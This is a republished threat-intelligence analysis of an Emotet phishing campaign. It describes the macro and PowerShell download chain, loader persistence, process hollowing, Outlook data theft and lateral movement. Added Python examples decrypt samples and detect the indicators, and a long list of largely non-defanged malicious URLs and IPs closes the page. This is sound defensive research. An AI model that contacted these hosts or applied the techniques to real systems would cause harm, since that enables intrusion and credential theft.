2025-01-17 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/02 Report
Overview
Emotet is a banking Trojan spread by email that lures users into clicking and executing malicious code. It was first discovered in 2014 and has remained continuously active since; it also has a certain presence in China. Its active anti-virus evasion strategy makes it a difficult opponent.
Qianxin Virus Response Center issued an Emotet threat warning on September 23, 2019. Through long-term tracking, it recently found several Emotet spear-phishing emails carrying malicious macro code. The mail induces the user to click "Enable Macros" so that the macro runs; the macro then uses PowerShell to download and execute the next-stage attack payload. The attack modules observed include an Outlook data theft module and a lateral movement module.
The sample execution process is as follows:
Sample analysis
Document analysis
The decoy document is written in English and displays a prompt asking the user to enable macros:
When the user enables macros, AutoOpen runs automatically, triggering the macro code. AutoOpen eventually decodes a piece of Base64-encoded PowerShell code and then calls PowerShell to execute it.
The Base64 code and the decoded data are as follows:
After tidying up the decoded Base64 data, it can be seen that the code attempts to download the next-stage attack payload from five different servers and executes the payload if any download succeeds.
The payload hosting servers used this time include a compromised host; Emotet also uses such hosts to evade detection.
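The triage step described above (decoding the Base64 PowerShell that the macro hands off and pulling out the download URLs) can be scripted. The following is an added example, not code from the original report or from Qianxin; the encoded command it decodes is a harmless constructed stand-in with placeholder `.invalid` hostnames, not the page's IoCs, and it assumes the usual `-EncodedCommand` convention of Base64 over UTF-16LE text.

```python
import base64
import re

# Constructed sample: a harmless stand-in for the encoded command the macro
# passes to PowerShell. The real stage used five download URLs; these
# hostnames are placeholders, not the IoCs from the report.
_PLAIN = (
    '$urls = "http://example-a.invalid/wp-content/a/","http://example-b.invalid/wp-admin/b/";'
    'foreach($u in $urls){ try { (New-Object Net.WebClient).DownloadFile($u,$env:TEMP+"\\x.exe"); break } catch {} }'
)
SAMPLE_ENCODED = base64.b64encode(_PLAIN.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """PowerShell's -EncodedCommand carries Base64 over UTF-16LE text."""
    raw = base64.b64decode(b64)
    return raw.decode("utf-16-le")


# Stop at whitespace and the quote/separator characters that delimit a URL
# inside a PowerShell string literal or array.
URL_RE = re.compile(r"""https?://[^\s'"(),;]+""", re.IGNORECASE)


def extract_urls(script: str) -> list:
    """Return the download URLs in first-seen order, without duplicates."""
    seen = []
    for url in URL_RE.findall(script):
        if url not in seen:
            seen.append(url)
    return seen


def defang(url: str) -> str:
    """Rewrite a URL the way the IoC section does (hxxp) plus a bracketed dot,
    so it cannot be clicked by accident when pasted into a report."""
    return re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE).replace(".", "[.]")


def triage(b64: str) -> dict:
    """Decode the stage, list its URLs, and produce a defanged copy for reporting."""
    script = decode_encoded_command(b64)
    urls = extract_urls(script)
    return {"script": script, "urls": urls, "defanged": [defang(u) for u in urls]}


if __name__ == "__main__":
    for line in triage(SAMPLE_ENCODED)["defanged"]:
        print(line)
```

The decoded script is what you would paste into the report; the defanged URL list is what goes to blocking and hunting.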
EmotetLoader analysis
The sample's reference compile time is October 7, 2019. Qianxin Virus Response Center's data shows that domestic DNS resolution of the five URLs visited by the PowerShell code began on October 26.
The sample is built on MFC, and the functional code is implemented in an export function. After the window is created, the export function nZzNNxCMObNaV is called from the message handling function.
Every API called inside the nZzNNxCMObNaV export function is resolved dynamically: the function name is read from a resource by its ID, the address is looked up, and the function is then called.
RC4 is then used to decrypt the ShellCode before executing it; the key is vGdOmmadpKaisrM:
Analysis of the encrypted ShellCode in the Loader
The decrypted ShellCode contains a PE file and is loaded in memory, and the DLL reference compile time is October 18:
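The two steps just described, RC4-decrypting the blob with the recovered key and then locating the PE image inside the decrypted ShellCode, are what an analyst automates when unpacking further samples of the same family. Below is an added example (not code from the report or from Qianxin). The RC4 key is the one given above; the encrypted blob is constructed inside the script from a fake minimal PE, since the real sample's bytes are not on the page.

```python
import struct

RC4_KEY = b"vGdOmmadpKaisrM"   # key reported in the analysis above


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). RC4 is symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def find_embedded_pe(buf: bytes) -> int:
    """Return the offset of the first plausible PE image in buf, or -1.
    Plausible means: 'MZ' whose e_lfanew (at +0x3C) points at 'PE\\0\\0'."""
    start = 0
    while True:
        off = buf.find(b"MZ", start)
        if off < 0 or off + 0x40 > len(buf):
            return -1
        e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
        pe = off + e_lfanew
        if 0x40 <= e_lfanew < 0x1000 and buf[pe:pe + 4] == b"PE\x00\x00":
            return off
        start = off + 1


def build_fake_pe() -> bytes:
    """Constructed stand-in for the decrypted payload: a 16-byte shellcode stub
    followed by a minimal DOS header whose e_lfanew points at a PE signature."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3A)        # bytes 0x00..0x3B
    hdr += struct.pack("<I", 0x80)                  # e_lfanew at 0x3C
    hdr += b"\x00" * (0x80 - len(hdr))              # pad up to the PE signature
    hdr += b"PE\x00\x00" + b"\x00" * 20
    return b"\x90" * 0x10 + bytes(hdr)


# Constructed ciphertext: what the loader's resource/array would hold.
SAMPLE_ENCRYPTED = rc4(RC4_KEY, build_fake_pe())


def decrypt_and_locate(blob: bytes, key: bytes = RC4_KEY):
    """Decrypt the blob and report where the embedded PE starts (-1 if none)."""
    plain = rc4(key, blob)
    return plain, find_embedded_pe(plain)


if __name__ == "__main__":
    plain, off = decrypt_and_locate(SAMPLE_ENCRYPTED)
    print("embedded PE at offset", off, "of", len(plain), "bytes")
```

The e_lfanew sanity check matters in practice: raw shellcode often contains stray "MZ" byte pairs, and a wrong key produces random data, so checking that the DOS header actually points at a PE signature avoids carving garbage.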
After reading the command line, it compares it with "--b57a4fbf" to determine whether the expected parameter is present; if not, it restarts itself with that parameter and exits the current process:
Get the disk serial number after starting with parameters:
Format the serial number into the Mutex name:
Create a Mutex named "Global\I90D2908D":
and a Mutex named "Global\M90D2908D":
and a Mutex named "Global\E90D2908D":
Map your own file into memory and calculate the value of CRC32:
Get the computer name:
Create a service named "sketchflow" whose binary, sketchflow.exe, is a copy of the sample placed in the system32 directory, start the service, and then call ExitProcess to exit.
If the OpenSCManager call made before creating the service fails, meaning persistence through a service is not currently possible, persistence is instead achieved through the Run registry key:
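The loader behaviours described from the restart parameter through the service/Run-key persistence give a defender several host-level indicators. The following is an added example (not code from the report or from Qianxin) that matches those indicators over a handful of constructed events in a simplified Sysmon-like shape: ID 1 process creation, ID 11 file creation, ID 13 registry value set, plus a sandbox-style "mutex" event, since Sysmon itself does not log mutex creation. The event field names, the registry paths, and the PIDs are all constructed for the example; the mutex naming pattern `Global\<I|M|E><8 hex digits>` is generalised from the three names listed above.

```python
import re

# Constructed events (not real telemetry). One loader process (pid 4100)
# exhibits each indicator; pid 5000 is a benign control.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4100, "image": r"C:\Users\u\AppData\Local\Temp\x.exe",
     "cmdline": r'"C:\Users\u\AppData\Local\Temp\x.exe" --b57a4fbf'},
    {"id": 11, "pid": 4100, "target": r"C:\Windows\System32\sketchflow.exe"},
    {"id": 13, "pid": 4100,
     "target": r"HKLM\SYSTEM\CurrentControlSet\Services\sketchflow\ImagePath",
     "details": r"C:\Windows\System32\sketchflow.exe"},
    {"id": 13, "pid": 4100,
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sketchflow",
     "details": r"C:\Windows\System32\sketchflow.exe"},
    {"id": 1, "pid": 5000, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"id": "mutex", "pid": 4100, "name": r"Global\I90D2908D"},
]

# Generalised from the three mutex names in the analysis: Global\ + I/M/E + 8 hex digits.
MUTEX_RE = re.compile(r"^Global\\[IME][0-9A-F]{8}$")


def match_event(ev: dict) -> list:
    """Return the names of every indicator rule this single event satisfies."""
    hits = []
    if ev["id"] == 1 and "--b57a4fbf" in ev.get("cmdline", ""):
        hits.append("loader_restart_parameter")
    if ev["id"] == 11 and ev["target"].lower().endswith("\\system32\\sketchflow.exe"):
        hits.append("loader_copied_to_system32")
    if ev["id"] == 13:
        target = ev["target"].lower()
        if "\\services\\sketchflow\\" in target:
            hits.append("service_persistence")
        elif "\\currentversion\\run\\" in target and "sketchflow" in ev.get("details", "").lower():
            hits.append("run_key_fallback")     # the non-service fallback path
    if ev["id"] == "mutex" and MUTEX_RE.match(ev.get("name", "")):
        hits.append("emotet_mutex_pattern")
    return hits


def scan(events: list) -> dict:
    """Group rule hits by pid so that one process showing several indicators
    stands out from a benign process that trips none."""
    findings = {}
    for ev in events:
        for rule in match_event(ev):
            findings.setdefault(ev["pid"], []).append(rule)
    return findings


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```

Correlating by process matters more than any single rule: a lone Run-key write is common, but the same process also carrying the restart parameter and dropping sketchflow.exe into System32 is a strong signal.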
Call the system API to get the current system information:
Get the current process SessionID through the PEB structure:
Enumerate processes:
Format the online URL:
Call Http series functions to communicate with the server:
If the connection succeeds, InternetReadFile is called to read the data from the server; if it fails, the loader waits 4571 ms via WaitForSingleObject and then repeats the steps above.
Call CryptDecrypt to decrypt:
Allocate memory, fix up the import table of the payload downloaded from the server, and create a thread to load it:
There are three ways to process data after downloading from the server:
The first writes the data directly to a file and invokes CreateProcess to execute the plug-in:
The second writes the data to a file and then creates the process under a different session:
The third is to call CreateThread directly to execute ShellCode:
While continuing to monitor Emotet, Qianxin Virus Response Center found another version of the EmotetLoader sample. Its basic functionality is unchanged, but the way the internally encrypted ShellCode is handled is new.
One variant stores the encrypted ShellCode in an array; the other places it in the resource data and retrieves it through a series of APIs such as FindResourceA before decrypting it.
The PayLoad downloaded from the server by the captured sample actually contains two attack modules: one steals Outlook data, the other performs lateral movement.
Analysis of the PayLoad requested from the server
The PayLoad downloaded from the server is executed by creating a thread; the dumped code turns out to be a DLL with a reference compile time of October 15, 2019.
When DllMain runs, it first tries to delete a file in the Temp directory; this file is created by the code injected into the child process and holds the harvested Outlook information:
Allocate memory and unpack into it the code that is to be injected into the process:
Create a suspended copy of itself, with the parameter being the path of the file in which the harvested Outlook data is saved:
Allocate memory in the child process and call GetThreadContext to obtain the child's thread context. The original child process image is mapped at 0x400000:
Write the previously unpacked DLL from memory into the child process, and call SetThreadContext to point the child's EIP at the injected code:
The address written to in the child process is 0x400000, i.e. the address at which the module is mapped when the child process is initialised; WriteProcessMemory overwrites the original data there. This injection technique is a classic Process Hollowing.
Because the child process was created suspended, when its thread resumes it runs RtlUserThreadStart, and the value in EAX points to the OEP of the injected DLL, where execution then begins.
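The hollowing sequence just described (suspended child, GetThreadContext, overwrite at the image base, SetThreadContext, resume) is recognisable in a sandbox API trace. The following is an added example (not code from the report or from Qianxin) that walks such a trace and flags the pattern. The trace and its field names are constructed for the example, and it simplifies by using the child's PID as its process handle and the thread ID as its thread handle; the image base defaults to the 0x400000 noted above.

```python
CREATE_SUSPENDED = 0x00000004

# Constructed sandbox-style API trace (not real telemetry). Handles are
# simplified to the PID/TID they refer to. The Eax value on SetThreadContext
# stands for the new entry point the analysis describes.
SAMPLE_TRACE = [
    {"api": "CreateProcessW",
     "args": {"lpCommandLine": r"C:\Users\u\x.exe C:\Users\u\AppData\Local\Temp\ol.tmp",
              "dwCreationFlags": CREATE_SUSPENDED},
     "ret": {"dwProcessId": 4200, "dwThreadId": 4204}},
    {"api": "GetThreadContext", "args": {"hThread": 4204}},
    {"api": "VirtualAllocEx", "args": {"hProcess": 4200, "lpAddress": 0x400000, "dwSize": 0x20000}},
    {"api": "WriteProcessMemory", "args": {"hProcess": 4200, "lpBaseAddress": 0x400000, "nSize": 0x200}},
    {"api": "WriteProcessMemory", "args": {"hProcess": 4200, "lpBaseAddress": 0x401000, "nSize": 0x1F000}},
    {"api": "SetThreadContext", "args": {"hThread": 4204, "Eax": 0x40A3C0}},
    {"api": "ResumeThread", "args": {"hThread": 4204}},
]

# A debugger-like benign trace: suspended start, context read, resume, no writes.
BENIGN_TRACE = [
    {"api": "CreateProcessW",
     "args": {"lpCommandLine": r"C:\Windows\System32\notepad.exe", "dwCreationFlags": CREATE_SUSPENDED},
     "ret": {"dwProcessId": 4300, "dwThreadId": 4304}},
    {"api": "GetThreadContext", "args": {"hThread": 4304}},
    {"api": "ResumeThread", "args": {"hThread": 4304}},
]


def detect_hollowing(trace: list, image_base: int = 0x400000) -> list:
    """Return one finding per suspended child whose image base was overwritten
    and whose thread context was then replaced before the thread was resumed."""
    children = {}        # pid -> per-child state
    thread_to_pid = {}   # tid -> pid
    for call in trace:
        api, a = call["api"], call["args"]
        if api.startswith("CreateProcess") and a.get("dwCreationFlags", 0) & CREATE_SUSPENDED:
            pid, tid = call["ret"]["dwProcessId"], call["ret"]["dwThreadId"]
            children[pid] = {"tid": tid, "cmd": a.get("lpCommandLine", ""),
                             "wrote_base": False, "set_ctx": False, "resumed": False, "new_eip": None}
            thread_to_pid[tid] = pid
        elif api == "WriteProcessMemory" and a["hProcess"] in children:
            # Only a write that covers the mapped image base counts as hollowing.
            if a["lpBaseAddress"] <= image_base < a["lpBaseAddress"] + a["nSize"]:
                children[a["hProcess"]]["wrote_base"] = True
        elif api == "SetThreadContext" and a["hThread"] in thread_to_pid:
            st = children[thread_to_pid[a["hThread"]]]
            st["set_ctx"] = True
            st["new_eip"] = a.get("Eax")
        elif api == "ResumeThread" and a["hThread"] in thread_to_pid:
            children[thread_to_pid[a["hThread"]]]["resumed"] = True

    findings = []
    for pid, st in children.items():
        if st["wrote_base"] and st["set_ctx"] and st["resumed"]:
            findings.append({"pid": pid, "cmdline": st["cmd"], "entry": st["new_eip"]})
    return findings


if __name__ == "__main__":
    print(detect_hollowing(SAMPLE_TRACE))
    print(detect_hollowing(BENIGN_TRACE))
```

Keying on the write that covers the image base, rather than on CREATE_SUSPENDED alone, is what keeps debuggers and some installers from triggering the rule.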
Then wait for the process to finish executing and exit, and read the data from the Temp file:
The connection server sends the data and waits for the data to return:
Analysis of module 1 injected into the process
The module is a DLL that is injected into the child process through SetThreadContext, and the reference compilation time is March 31, 2019.
After the DLL starts, it queries Outlook's DLLPathEx registry value for information:
Create a file in the Temp directory that is responsible for saving information about the read OutLook:
The PayLoad gets the OutLook data content:
Get it and format it, write it to the Tmp file, and then the process exits:
Module 2 analysis
The module is executed directly in memory through a thread.
After starting, the module obtains the computer name and the current process name and decrypts the username and password dictionary in memory.
The decrypted password dictionary is as follows:
Enumerate the network resources in the current network environment:
Attempt to connect to the target servers using the dictionary; on success, copy its own file to the target machine and start it there via a service, achieving lateral movement:
Summary
Qianxin Virus Response Center found multiple related samples; the Loader used and the PayLoad downloaded from the server differ between them, which suggests that the attackers behind Emotet may be evading similarity-based detection of related samples while improving the samples' functionality. Judging by the sample behaviour, the main purpose of this attack is to collect user computer information and Outlook data and to move laterally; the attackers may be laying the groundwork for subsequent deeper attacks.
Qianxin Virus Response Center reminds users to raise their security awareness and not to open unknown emails casually, in order to prevent attacks by such malicious samples.
At present, Qianxin Group's full range of products, including Sky Rock, Sky Eye, SOC, situational Awareness, and threat Intelligence platform, support the detection of attacks related to the report.
IOCs
Hxxp://www.encitmgdk.com/wp-content/jz9j7hptcw-bgwvnoaacn-64826306/
Hxxp://new.1communityre.com/wp-admin/NhwvCC/
Hxxps://simplecuisine.000webhostapp.com/wp-admin/UOdPpFk/
Hxxps://ejerciciosantonio.000webhostapp.com/wp-admin/yds9q9bnpj-gp81uc99l-661630/
Hxxps://edu.tizino.com/wvcly/uvsMEaKW/
96.20.84.254
45.56.122.75
85.25.92.96
94.177.253.126
189.166.13.109
212.112.113.235
216.70.88.55
138.186.179.235
95.216.207.86
176.58.93.123
189.132.130.111
75.154.163.1
60.52.64.122
181.36.42.205
143.95.101.72
203.99.188.11
70.45.30.28
110.36.234.146
190.117.206.153
190.55.39.215
186.84.173.153
187.143.219.242
181.47.235.26
185.45.24.254
190.13.146.47
5.189.148.98
190.217.1.149
200.55.168.82
154.120.227.206
162.241.134.130
190.228.212.165
91.109.5.28
190.96.118.15
70.32.94.58
83.169.33.157
190.113.146.128
144.76.62.10
201.217.113.58
216.75.37.196
181.61.143.177
211.229.116.130
157.7.164.178
186.92.11.143
203.99.187.137
187.188.166.192
203.99.188.203
190.16.101.10
201.196.15.79
113.52.135.33
186.109.91.136
189.218.243.150
42.190.4.92
178.249.187.150
138.197.140.163
51.38.134.203
23.253.207.142
186.146.110.108
152.170.220.95
200.90.86.170
192.241.220.183
172.104.70.207
181.197.2.80
Http://111.119.233.65/codec/site/
Http://190.210.184.138/ban/
Http://51.255.165.160/loadan/enabled/raster/merge/
Http://45.56.79.249/arizona/
Http://163.172.40.218/health/
Http://91.205.215.57/stubs/symbols/raster/merge/
Http://68.183.170.114/iab/arizona/raster/merge/
Http://190.217.1.149/site/add/
Http://62.75.160.178/child/sess/
Http://200.113.106.18/publish/iab/raster/
Http://5.196.35.138/devices/prov/raster/
Http://89.188.124.145/prep/devices/raster/
Http://89.188.124.145/vermont/srvc/
Http://186.23.132.93/entries/ban/scripts/merge/
Http://51.15.8.192/loadan/sym/
Http://190.38.14.52/usbccid/cone/scripts/merge/
Http://217.199.160.224/usbccid/
Http://207.154.204.40/report/xian/scripts/
Http://142.93.114.137/health/prep/
Http://94.183.71.206/iplk/
Http://190.104.253.234/pnp/balloon/scripts/
Http://212.71.237.140/bml/teapot/scripts/
Http://201.163.74.202/publish/scripts/scripts/merge/
Http://201.190.133.235/bml/usbccid/
Http://186.15.57.7/scripts/child/
Http://86.42.166.147/acquire/
Http://82.196.15.205/cookies/
Http://186.68.141.218/taskbar/ringin/
Http://46.28.111.142/scripts/
Http://138.68.106.4/health/cookies/scripts/merge/
Http://190.10.194.42/child/codec/scripts/merge/
Http://104.131.58.132/guids/ban/scripts/merge/
Http://190.230.60.129/badge/entries/
Http://109.169.86.13/guids/
Http://181.44.166.242/merge/tlb/scripts/
Http://46.41.151.103/sess/xian/scripts/
Http://144.139.158.155/devices/sess/scripts/
Http://183.82.97.25/psec/chunk/scripts/merge/
Http://149.62.173.247/raster/devices/scripts/
Http://81.169.140.14/xian/splash/
Http://190.230.60.129/enable/acquire/scripts/merge/
Http://77.245.101.134/child/between/scripts/merge/
Http://46.29.183.211/acquire/
Http://68.183.190.199/balloon/
Http://220.241.38.226/guids/arizona/scripts/
Http://45.79.95.107/attrib/xian/
Http://200.58.83.179/balloon/srvc/
Http://190.97.30.167/schema/vermont/scripts/
Http://178.79.163.131/symbols/devices/scripts/merge/
Http://77.55.211.77/badge/splash/scripts/merge/
Http://201.213.32.59/site/acquire/scripts/merge/
Http://79.143.182.254/teapot/
Http://14.160.93.230/stubs/entries/scripts/
Http://178.249.187.151/entries/report/scripts/
Http://190.182.161.7/pdf/arizona/
Http://181.59.253.20/ringin/jit/scripts/merge/
Http://139.5.237.27/results/ringin/scripts/
Http://154.120.227.206/ringin/iab/scripts/
Http://91.83.93.124/chunk/vermont/
Http://181.16.17.210/stubs/cookies/
Http://80.85.87.122/jit/balloon/scripts/merge/
Http://119.59.124.163/badge/tpt/
Http://190.230.60.129/site/raster/scripts/
Http://181.135.153.203/cab/enabled/scripts/
Http://185.86.148.222/usbccid/entries/
Http://46.101.212.195/devices/taskbar/scripts/merge/
Http://200.113.106.18/usbccid/symbols/scripts/
Http://50.28.51.143/splash/
Http://86.6.188.121/report/chunk/
Http://62.75.143.100/between/prov/scripts/merge/
Http://81.213.215.216/guids/iplk/
Http://181.36.42.205/acquire/
Http://186.1.41.111/attrib/
Http://203.25.159.3/sess/
Http://79.127.57.43/jit/window/
Http://69.163.33.84/vermont/bml/scripts/merge/
Http://190.146.131.105/prep/
Http://87.106.77.40/symbols/
Http://91.204.163.19/walk/ringin/scripts/
Http://94.177.183.28/codec/publish/
Http://111.119.233.65/enabled/
Http://190.210.184.138/enabled/iplk/scripts/merge/
Http://51.255.165.160/forced/
Http://45.56.79.249/badge/site/
Http://163.172.40.218/arizona/walk/scripts/
Http://68.183.170.114/badge/merge/scripts/
Http://62.75.160.178/usbccid/taskbar/
Http://200.113.106.18/json/forced/scripts/
Http://89.188.124.145/sym/img/scripts/
Http://186.23.132.93/badge/prep/scripts/merge/
Http://51.15.8.192/ringin/vermont/scripts/merge/
Http://190.38.14.52/json/devices/scripts/merge/
Http://217.199.160.224/cookies/splash/scripts/merge/
Http://207.154.204.40/attrib/json/raster/
Http://94.183.71.206/glitch/enabled/raster/
Http://212.71.237.140/between/taskbar/raster/merge/
Http://201.163.74.202/loadan/loadan/
Http://201.190.133.235/odbc/img/
Http://186.15.57.7/cab/srvc/raster/
Http://86.42.166.147/scripts/attrib/
Http://82.196.15.205/report/devices/
Http://186.68.141.218/attrib/tpt/raster/
Http://46.28.111.142/attrib/json/
Http://138.68.106.4/forced/window/raster/
Http://190.10.194.42/splash/
Http://104.131.58.132/schema/cone/raster/
Http://190.96.118.15/health/report/raster/
Http://190.230.60.129/loadan/xian/
Http://109.169.86.13/cone/
Http://181.44.166.242/enabled/chunk/raster/
Http://46.41.151.103/schema/iplk/
Http://144.139.158.155/sym/badge/raster/
Http://183.82.97.25/jit/
Http://149.62.173.247/health/pnp/
Http://81.169.140.14/loadan/enabled/raster/
Http://190.230.60.129/symbols/
Http://159.203.204.126/acquire/child/raster/
Http://77.245.101.134/publish/symbols/raster/merge/
Http://46.29.183.211/balloon/pdf/raster/merge/
Http://68.183.190.199/json/chunk/raster/
Http://220.241.38.226/jit/vermont/
Http://45.79.95.107/chunk/devices/
Http://190.97.30.167/srvc/health/raster/merge/
Http://178.79.163.131/results/walk/raster/
Http://190.120.104.21/acquire/raster/
Http://77.55.211.77/iplk/enabled/
Http://201.213.32.59/health/between/raster/merge/
Http://79.143.182.254/report/cone/raster/merge/
Http://14.160.93.230/schema/arizona/raster/
Http://178.249.187.151/child/xian/
Http://190.182.161.7/between/
Http://181.59.253.20/srvc/prov/raster/merge/
Http://139.5.237.27/scripts/cookies/raster/
Http://154.120.227.206/codec/balloon/raster/
Http://91.83.93.124/cookies/splash/
Http://181.16.17.210/enable/json/raster/merge/
Http://80.85.87.122/rtm/
Http://119.59.124.163/ringin/usbccid/
Http://190.230.60.129/iplk/
Http://181.135.153.203/loadan/
Http://185.86.148.222/loadan/tlb/raster/
Http://46.101.212.195/prov/
Http://200.113.106.18/window/
Http://201.184.41.228/stubs/enable/
Http://50.28.51.143/window/
Http://86.6.188.121/arizona/balloon/raster/merge/
Http://62.75.143.100/prep/tpt/raster/
Http://81.213.215.216/loadan/json/
Http://181.36.42.205/entries/
Http://186.1.41.111/enable/glitch/raster/merge/
Http://203.25.159.3/cab/
Http://79.127.57.43/loadan/forced/raster/
Http://69.163.33.84/raster/pdf/raster/
Http://41.75.135.93/tlb/nsip/
Http://190.146.131.105/arizona/publish/raster/merge/
Http://87.106.77.40/raster/vermont/raster/merge/
Http://91.204.163.19/prep/iplk/raster/merge/
Http://94.177.183.28/vermont/odbc/
Http://51.254.218.210/iab/attrib/acquire/merge/